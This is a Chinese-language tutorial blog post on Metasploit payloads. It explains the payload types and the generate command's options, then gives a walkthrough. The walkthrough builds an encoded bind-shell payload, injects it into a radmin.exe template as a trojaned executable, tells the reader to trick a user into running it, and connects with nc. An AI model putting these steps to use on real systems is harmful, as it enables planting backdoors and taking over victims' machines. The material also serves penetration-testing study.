【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法

这篇具有很好参考价值的文章主要介绍了【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、简介:

1.1、payload(攻击载荷):

1.2、Shellcode:

二、payload分类

2.1、singles(独立载荷)

2.2、stagers(传输器载荷)

2.2.1、简介:

2.2.2、特点:

2.2.3、分类:

2.3、stages(传输体载荷)

2.3.1、简介:

2.3.2、示例:

三、相关命令

四、使用方法:

4.1、方法一:

4.2、方法二:

4.2.1、第一步:还是选择模块

4.2.2、第二步:直接使用payload

4.2.3、第三步:考虑过滤坏字符

4.2.4、第四步:考虑多次加密、输出格式等

4.2.5、第五步:诱使用户使用程序

4.2.6、第六步:连接目标端口


一、简介:

1.1、payload(攻击载荷):

主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等,payloads也被称为shellcode。

一般在exploit中调用payload

也可以使用 generate 命令直接生成payload


exploit是利用漏洞的一个过程和方法,最终的目的是为了执行payload(攻击代码)


1.2、Shellcode:

是一段代码(或填充数据),作为数据发送到目标服务器利用特定漏洞的代码,用于获取权限。



二、payload分类

2.1、singles(独立载荷)

可直接植入目标系统并执行相应的程序(payload:shell_bind_tcp)

2.2、stagers(传输器载荷)

2.2.1、简介:

用于目标机与攻击机之间建立稳定的网络连接,与传输体载荷配合攻击。


2.2.2、特点:

为在漏洞利用后方便注入,载荷体积都非常小,且这类载荷功能都非常相似


2.2.3、分类:

bind型,需要攻击机主动连接目标端口

reverse型,目标机会反连接攻击机,提前设定好连接攻击机的ip地址和端口号

2.3、stages(传输体载荷)

2.3.1、简介:

stagers建立连接后,攻击机将stages传输给目标机,由stagers进行相应处理,将控制权转交给stages。


2.3.2、示例:

得到目标机的shell或meterpreter控制程序运行

攻击机可以在本端输入相应命令控制目标机。



三、相关命令

选项:

-E       

编码


-O <opt>  

弃用:“ -o”选项的别名


-P <opt>  

总所需有效载荷尺寸,自动生产适当的NOP雪橇长度


-S <opt>  

生成(大)Windows二进制文件时要使用的新部分名称


-b <opt>  

字符列表避免示例:'\ x00 \ xff'


-e <opt>  

用于使用的编码器


-f <opt>  

输出格式:base32,base64,bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,python-reflection,vba,vba-exe,vba-psh,vbs,war


-h        

显示此消息


-i <opt>  

编码有效载荷的次数


-k        

保留模板行为并将有效载荷注入新线程


-n <opt>  

在有效载荷上预先设置[长度]大小的点头


-o <opt>  

输出文件名(否则stdout)


 -p <opt>  

有效载荷的平台


-v        

详细输出


-x <opt>  

指定自定义可执行文件以用作模板



四、使用方法:

4.1、方法一:

一般的使用方法

使用exploit时,用 use 去使用的payload(即set调用各种payload)

4.2、方法二:

直接使用payload:直接用 use 使用一个payload


4.2.1、第一步:还是选择模块

#查看payload模块,也可以输入关键字然后会检索出来

use payload/

use payload/windows/shell_bind_tcp

show options 

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法

LPORT:

监听端口,也就是目标开放的端口

RHOST:

目标机器只接受某个远程主机来连接它的4444端口(目标开放的端口),限制了来源IP(不设置的话,都可以连上去获取shell)


4.2.2、第二步:直接使用payload

使用 generate 命令来生成payload

输入generate

可以获得payload的一些基本信息和设置的参数,buf 就是 payload 的16进制表示方式

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法


4.2.3、第三步:考虑过滤坏字符

产生的payload中可能存在“坏字符”

被执行过程中会被过滤掉、或被替代,导致无法产生预期结果

eg:

缓冲区溢出中,会把 “\x00”认为是一个坏字符,导致shellcode无法执行


生成payload时(默认不使用encoder)

比如过滤掉 “\x00” 就会从已有的encoder中选择最理想的一个

也可以手动指定encoder

#显示可用的encoders

show encoders

#使用指定的encoder

generate -e x86/add_sub

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法


坏字符太多,就需要自己手动加上去

generate -b '\x00\xff'

利用 -b 参数,后面跟上要避免出现的坏字符(也就是过滤掉)

坏字符一般不止一个

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法


过滤掉坏字符后的payload大小也变化了

“\x00”可能由1个字节变成2个甚至更多字节去表示

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法

 【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法


4.2.4、第四步:考虑多次加密、输出格式等

#研究一下输出格式之间代码是否有区别

 #输出python使用的payload

generate -f python LHOST=192.168.190.131

LHOST是填自己的

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法

#输出python使用的payload

generate -f c LHOST=192.168.190.131

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法

对比可以发现,其实c语言格式输出的,和python格式输出的是存在不一样的

#完整的一个输出exe文件

generate -b '\x00\xff' -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -o /root/1.exe

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法

打开目录位置 /root/1.exe

【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法


4.2.5、第五步:诱使用户使用程序

将exe文件拷贝/发送到目标主机上运行


4.2.6、第六步:连接目标端口

nc IP 端口号文章来源地址https://www.toymoban.com/news/detail-401738.html

到了这里,关于【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Android A/B System OTA分析(六)如何获取 payload 的 offset 和 size

    Android A/B 系统基础入门系列《Android A/B 系统》已完结,文章列表: Android A/B System OTA分析(一)概览 Android A/B System OTA分析(二)系统image的生成 Android A/B System OTA分析(三)主系统和bootloader的通信 Android A/B System OTA分析(四)系统的启动和升级 Android A/B System OTA分析(五)客户

    2024年01月22日
    浏览(50)
  • 小米手机无需刷入Recovery获取Root权限,卡刷包payload.bin提取boot.img文件

    注意一下操作都需要解bl锁,退出手机账号,备份数据,打开use调试才可以 (1)https://xiaomirom.com/ 下载线刷包 .tgz 解压 (2)https://xiaomirom.com/download-xiaomi-flash-tool-miflash/ 下载线刷工具 (1)下载卡刷包,解压获得payload.bin文件 (2)下载payload_dumper-win64,将payload.bin文件放到payload_input目录下

    2024年02月11日
    浏览(233)
  • Nginx报错 HTTP 413 Request Entity Too Large(Payload Too Large)解决方案

    上传文件时,请求参数过大,导致超出服务端限制。 客户端发送的实体主体部分比服务器能够或者希望处理的要大。  Nginx默认最大能够上传1MB文件,打开nginx.conf在http{}中,找到server{}设置: client_max_body_size 30m;(配置客户端请求实体最大值) client_body_buffer_size 128k;(配置请

    2024年02月07日
    浏览(63)
  • 【计算机网络】TCP中payload的解析,在python中的体现?字节、字符?为啥字节用十六进制表示?

    问题来源 最近要根据一份国家标准协议进行解码,但是对于进制,字节,字符,编码,转码有比较多的问题。其中我想实现的主要需求如下: 有客户端与服务端,进行tcp通信,客户端要发送一个请求,tcp中payload请求大概是这样,有很多个十六进制表示的字节组成 根据协议的

    2024年02月11日
    浏览(59)
  • 内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)

    Msfconsole简称(msf)是一款 常用的渗透测试工具 ,包含了常见的漏洞利用模块和生成各种木马,方便于 安全测试人员的使用 .                  Msfconsole的使用:         第一步:进行端口扫描.         第二步:进行服务的扫描.         第三步:扫描3306(Mysql)端

    2024年02月16日
    浏览(39)
  • 【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)

    目录 一、简介: 二、下载: 2.1、kali 2.2、官网: 2.3、GitHub: 三、启动方法 四、msf常用基础命令 五、msf结构 六、 核心命令: 很容易地获取、开发并对计算机软件漏洞实施攻击 附带数百个已知软件漏洞的专业级漏洞攻击工具 kali linux 新版已内置metasploit,已经没有metasploi

    2024年02月05日
    浏览(59)
  • Metasploit——渗透攻击模块(Exploit)

    Metasploit常用命令、技术功能模块   Metasploit——辅助模块(Auxiliary)  目录 1.Exploit模块 2.生成Payload  3.Meterpreter常用命令 4.弱点扫描 Active exploits主动:攻击者主动向目标发起漏洞利用代码,触发漏洞             目标开放一个端口(服务),允许外界计算机连接这个端口(访问

    2024年02月11日
    浏览(47)
  • Unity进阶–通过PhotonServer实现人物移动和攻击–PhotonServer(五)

    Message peer类 客户端对接类 BLL管理 } 移动BLL 逻辑类 角色绑定的类

    2024年02月12日
    浏览(38)
  • 网络安全进阶学习第二课——XSS跨站脚本攻击

    首先了解什么是前端。前端从定义上来讲是指一个网站的前台部分,是展示给用户看的部分。它不需要关注任何业务之间的逻辑处理,只需要安安静静地做好自己,老老实实的把自己最美的一面展示给用户。 Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的

    2024年02月11日
    浏览(42)
  • SQL注入进阶:掌握联合查询注入和报错注入攻击技巧

    数据来源         本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。 介绍         联合查询注入是SQL注入的一种,通过在原有的SQL语句中添加UNION(联合)操作,将恶意构造的

    2024年02月06日
    浏览(54)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包